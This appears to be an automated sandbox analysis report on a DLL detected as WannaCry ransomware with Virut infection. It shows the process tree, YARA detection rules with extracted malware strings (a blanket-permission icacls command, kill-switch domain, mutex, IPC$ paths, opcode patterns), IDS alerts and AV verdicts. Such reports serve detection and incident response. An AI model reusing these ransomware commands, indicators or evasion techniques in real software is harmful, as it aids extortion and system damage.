Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HFKDS6VcNO

Overview

General Information

Sample Name:HFKDS6VcNO (renamed file extension from none to dll)
Analysis ID:670273
MD5:a653c0208aa9acb903bdb441897f8874
SHA1:817cbd6c8cae90d80555e1935c41adb8bcb0ba7a
SHA256:757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539
Tags:dllOpenCTIBRSandboxed
Infos:

Detection

Wannacry, Virut
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4728 cmdline: loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5032 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5772 cmdline: rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 5092 cmdline: C:\WINDOWS\mssecsvc.exe MD5: C69A376D234A2990509A077940306C82)
          • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
          • fontdrvhost.exe (PID: 692 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • fontdrvhost.exe (PID: 700 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 716 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 796 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 840 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 888 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 276 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 8 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 312 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 532 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1108 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1144 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1220 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1272 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1480 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1528 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1536 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s FontCache MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1728 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1736 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1772 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1780 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 3200 cmdline: rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1604 cmdline: rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 1504 cmdline: C:\WINDOWS\mssecsvc.exe MD5: C69A376D234A2990509A077940306C82)
        • tasksche.exe (PID: 5936 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 3296 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: C69A376D234A2990509A077940306C82)
    • dwm.exe (PID: 952 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
  • svchost.exe (PID: 5664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HFKDS6VcNO.dllWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
HFKDS6VcNO.dllJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    HFKDS6VcNO.dllwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\mssecsvc.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0x3136c:$x3: tasksche.exe
    • 0x4157c:$x3: tasksche.exe
    • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0x415d0:$x5: WNcry@2ol7
    • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
    • 0xe048:$x7: mssecsvc.exe
    • 0x17350:$x7: mssecsvc.exe
    • 0x31344:$x8: C:\%s\qeriuwjhrf
    • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xe034:$s1: C:\%s\%s
    • 0x17338:$s1: C:\%s\%s
    • 0x31358:$s1: C:\%s\%s
    • 0x414d0:$s3: cmd.exe /c "%s"
    • 0x73a24:$s4: msg/m_portuguese.wnry
    • 0x2e68c:$s5: \\192.168.56.20\IPC$
    • 0x1ba81:$s6: \\172.16.99.5\IPC$
    • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
    • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
    • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
    • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    C:\Windows\mssecsvc.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
    • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
    • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
    • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
    • 0x1d439:$s1: __TREEID__PLACEHOLDER__
    • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
    • 0x1f508:$s1: __TREEID__PLACEHOLDER__
    • 0x20570:$s1: __TREEID__PLACEHOLDER__
    • 0x215d8:$s1: __TREEID__PLACEHOLDER__
    • 0x22640:$s1: __TREEID__PLACEHOLDER__
    • 0x236a8:$s1: __TREEID__PLACEHOLDER__
    • 0x24710:$s1: __TREEID__PLACEHOLDER__
    • 0x25778:$s1: __TREEID__PLACEHOLDER__
    • 0x267e0:$s1: __TREEID__PLACEHOLDER__
    • 0x27848:$s1: __TREEID__PLACEHOLDER__
    • 0x288b0:$s1: __TREEID__PLACEHOLDER__
    • 0x29918:$s1: __TREEID__PLACEHOLDER__
    • 0x2a980:$s1: __TREEID__PLACEHOLDER__
    • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
    • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e340:$s1: __TREEID__PLACEHOLDER__
    C:\Windows\mssecsvc.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      C:\Windows\mssecsvc.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
      • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
      • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
      C:\Windows\mssecsvc.exeWin32_Ransomware_WannaCryunknownReversingLabs
      • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
      • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
      • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
      • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
      Click to see the 3 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
        00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
          0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
            00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
              00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
                Click to see the 143 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.0.mssecsvc.exe.7100a4.5.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
                • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
                • 0xf4d8:$x3: tasksche.exe
                • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
                • 0xf52c:$x5: WNcry@2ol7
                • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
                • 0xf42c:$s3: cmd.exe /c "%s"
                • 0x41980:$s4: msg/m_portuguese.wnry
                • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
                • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
                • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
                4.0.mssecsvc.exe.7100a4.5.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
                • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
                • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
                4.0.mssecsvc.exe.7100a4.5.unpackWin32_Ransomware_WannaCryunknownReversingLabs
                • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
                • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
                6.0.mssecsvc.exe.7100a4.5.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
                • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
                • 0xf4d8:$x3: tasksche.exe
                • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
                • 0xf52c:$x5: WNcry@2ol7
                • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
                • 0xf42c:$s3: cmd.exe /c "%s"
                • 0x41980:$s4: msg/m_portuguese.wnry
                • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
                • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
                • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
                6.0.mssecsvc.exe.7100a4.5.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
                • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
                • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
                Click to see the 135 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.7104.16.173.8049722802024298 07/20/22-19:38:14.180756
                SID:2024298
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.858715532024281 07/20/22-19:40:39.364164
                SID:2024281
                Source Port:58715
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.858838532012730 07/20/22-19:42:02.043613
                SID:2012730
                Source Port:58838
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.852925532024281 07/20/22-19:42:33.215516
                SID:2024281
                Source Port:52925
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:8.8.8.8192.168.2.753494952811577 07/20/22-19:41:32.051223
                SID:2811577
                Source Port:53
                Destination Port:49495
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7104.16.173.8049729802024298 07/20/22-19:40:36.366445
                SID:2024298
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.860996532024291 07/20/22-19:40:36.279977
                SID:2024291
                Source Port:60996
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:8.8.8.8192.168.2.753646182811577 07/20/22-19:41:09.165765
                SID:2811577
                Source Port:53
                Destination Port:64618
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.857859532024291 07/20/22-19:38:14.102838
                SID:2024291
                Source Port:57859
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.78.8.8.863557532012730 07/20/22-19:40:08.155803
                SID:2012730
                Source Port:63557
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:104.16.173.80192.168.2.780497222031515 07/20/22-19:38:14.222408
                SID:2031515
                Source Port:80
                Destination Port:49722
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:104.16.173.80192.168.2.780497292031515 07/20/22-19:40:36.404548
                SID:2031515
                Source Port:80
                Destination Port:49729
                Protocol:TCP
                Classtype:Misc activity

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: HFKDS6VcNO.dllVirustotal: Detection: 86%Perma Link
                Source: HFKDS6VcNO.dllReversingLabs: Detection: 89%
                Antivirus / Scanner detection for submitted sample
                Source: HFKDS6VcNO.dllAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 12%Perma Link
                Antivirus detection for dropped file
                Source: C:\Windows\mssecsvc.exeAvira: detection malicious, Label: W32/Virut.Gen
                Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/FileCoder.AU
                Multi AV Scanner detection for dropped file
                Source: C:\Windows\mssecsvc.exeVirustotal: Detection: 89%Perma Link
                Source: C:\Windows\mssecsvc.exeMetadefender: Detection: 82%Perma Link
                Source: C:\Windows\mssecsvc.exeReversingLabs: Detection: 97%
                Source: C:\Windows\tasksche.exeVirustotal: Detection: 89%Perma Link
                Source: C:\Windows\tasksche.exeMetadefender: Detection: 85%Perma Link
                Source: C:\Windows\tasksche.exeReversingLabs: Detection: 95%
                Machine Learning detection for sample
                Source: HFKDS6VcNO.dllJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Windows\mssecsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
                Source: 4.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
                Source: 4.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 9.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 6.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
                Source: 6.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 9.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 4.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
                Source: 4.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
                Source: 6.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
                Source: 4.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
                Source: 19.0.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
                Source: 4.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
                Source: 4.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
                Source: 6.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
                Source: 6.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
                Source: 4.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
                Source: 4.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 9.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
                Source: 6.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
                Source: 19.2.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
                Source: 9.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
                Source: 6.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
                Source: 6.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
                Source: 4.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
                Source: 6.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
                Source: 6.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
                Source: C:\Windows\tasksche.exeCode function: 19_2_004018B9 CryptReleaseContext,19_2_004018B9
                Source: HFKDS6VcNO.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

                Networking

                barindex
                Tries to download HTTP data from a sinkholed server
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jul 2022 17:38:14 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72dd7826abe95c14-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
